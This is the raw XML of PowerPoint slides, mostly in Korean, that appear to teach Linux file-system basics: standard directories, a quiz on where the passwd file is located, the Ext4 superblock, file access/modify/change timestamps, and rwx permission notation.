                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /bin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3296AF48-46A3-4C37-90D9-9D9A7364E216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8420471" y="3021616"/>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vsr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="TextBox 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C1110A-1E79-4059-8499-760C29F3767E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4257432" y="3290500"/>
            <a:ext cx="966281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /lib</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="TextBox 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC51D5AF-8A85-4B32-841D-FA4C80C97926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760086" y="3567499"/>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usr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB9CE4B-E646-4C32-8EB0-6330EE4AC6B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556847" y="3836406"/>
            <a:ext cx="2848584"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lost+found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  or /boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lost_found</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </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A5372EF5-E240-4A1D-BD66-5103BA6B3EE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DDEAA550-1783-4EE8-A9F3-EE5DF41C06E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325284" y="4252495"/>
            <a:ext cx="11720338" cy="1231747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F743BB"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t> “passwd” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>파일의 경로를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>찾으시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57273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6" grpId="0"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="69"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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BBD6991-3BC9-4E00-8534-B3FDC21364A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687742" y="2447291"/>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89D5763B-B485-4232-99BD-7248E872E6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752576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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– Ext4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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6019" y="3284059"/>
            <a:ext cx="380575" cy="380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03F4F97-0179-4ACE-80D7-7FFB078FF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173" y="2569494"/>
            <a:ext cx="5715000" cy="28860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93DCEA03-29ED-4A30-930E-6C6F381730C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31CAB47-E3D2-4188-8898-557AA2542A8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C4222F1-47E3-440E-8F40-DF2DF00854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A005A146-FB5C-4AF2-ADEC-7CB8389436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38DE9CBF-A8C9-4A98-8A6B-D0ADEF4597C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681947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en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Ext4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– Super </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Block</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="사용자 삽입 이미지">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7699CD-CBE5-4CE2-AE5E-1E251E6FF3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1359" b="14001"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2429375" y="2984392"/>
            <a:ext cx="5908507" cy="26458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9562" y="2325026"/>
            <a:ext cx="659366" cy="65936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AC93C74E-92AF-4BB3-A63B-F109D60D41F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C5AFC42-2306-4DF8-AF9B-7BE58FC49F3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BA9D161-E3F6-42C6-B0BD-FBE60FFEC5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0E293D4-4B4F-4646-A163-CB0DB199888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EBEDECEB-28B3-4D75-B37C-8CE8BFE5CD6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41213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/TimeStamp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파일 시스템 타임스탬프</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC772F9-5DCF-4600-BF1F-B1A7A94DC5B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778259606"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6637535" y="2410854"/>
          <a:ext cx="3900764" cy="1227266"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="697120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1459149">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1044102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1853058942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="700393">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4027726107"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234102">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-l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latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Description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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Example</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ls(1) option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접근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read,</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exec</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-u</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변조 시간</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write, truncate</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default</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err="1">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a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                          <a:cs typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>c</a:t>
                      </a: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i-node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변조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chmod</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chown</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
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3803D218-21EC-4539-ABBB-C6D494F61239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422446" y="1866105"/>
            <a:ext cx="7008394" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 파일마다 세 개의 시간 필드들이 커널에 의해 관리 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD702CC9-8EE0-4542-A498-6CEFFCD582CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188069" y="1690688"/>
            <a:ext cx="4950471" cy="5056320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3396B10F-A653-410B-A5B3-FC4F7E40F6EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3308887898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5422446" y="3923783"/>
          <a:ext cx="6581485" cy="2716965"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1095087">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5486398">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="90565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(Access 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파일이 어떤 명령이나 스크립트 등에 의해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열리거나 읽혀졌을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해당 파일을 열거나 파일 내용을 확인하는 명령어인 </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cat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="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head</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tail</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등으로 단순히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읽혀지기만</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하는 경우에도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0678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Modify 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데이터 수정시간으로서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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내용이 달라졌을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따라서 파일의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권한이나 소유자 등의 속성값을 변경할 </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때는 </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에는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영향을 미치지 않습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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데이터를 수정하여 파일 크기 등이 변경되거나 </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하면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그리고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ls -l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명령어를 쳤을 때 출력되는 파일의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시간값</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입니다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60452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ctime </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(Change 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 혹은 각종 속성값이 변경된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시점에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소유자 등 속성값 변경에 의해 기록되며 파일이 수정될 때도 물론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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="그룹 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CAD7FE9-1156-4399-AC4F-1F46C8CE9AB5}"/>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0A0BB49-BF2C-4E7C-BE76-506DC7E0AF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5E82FCA6-2DBE-46F8-BF1B-E7A0444F29E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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A4B422-C53B-49A1-9EC9-21B512C7C7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4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02439370-874E-4BF4-A2A4-0128BDE7659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841091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046690C6-9032-43CA-B4B7-F12F8A0F59C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611240" y="1925358"/>
            <a:ext cx="6594084" cy="1854586"/>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Permission )</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4"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4258CDB1-E79C-436C-B677-52F10535AA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624021" y="4849150"/>
            <a:ext cx="1066290" cy="906671"/>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d : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>디렉토리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>링크</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파일</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6ADEA5A-941E-4803-84A3-B71DD13F04A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624021" y="4364589"/>
            <a:ext cx="11024384" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0C0C0C"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     -        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       r-x       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          2       root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    631968  Nov 17   08:28    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BAFE41E-6205-459E-AE5C-46E93D12E7E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448474" y="3503851"/>
            <a:ext cx="6983427" cy="2760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5F41D2E6-94B0-47B6-8DFD-2A2D9E20A6C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793944" y="5243941"/>
            <a:ext cx="2629911" cy="1058888"/>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r  : read : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>읽기 가능  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w : write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 쓰기 가능  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>excute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 가능  </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권한 없음</a:t>
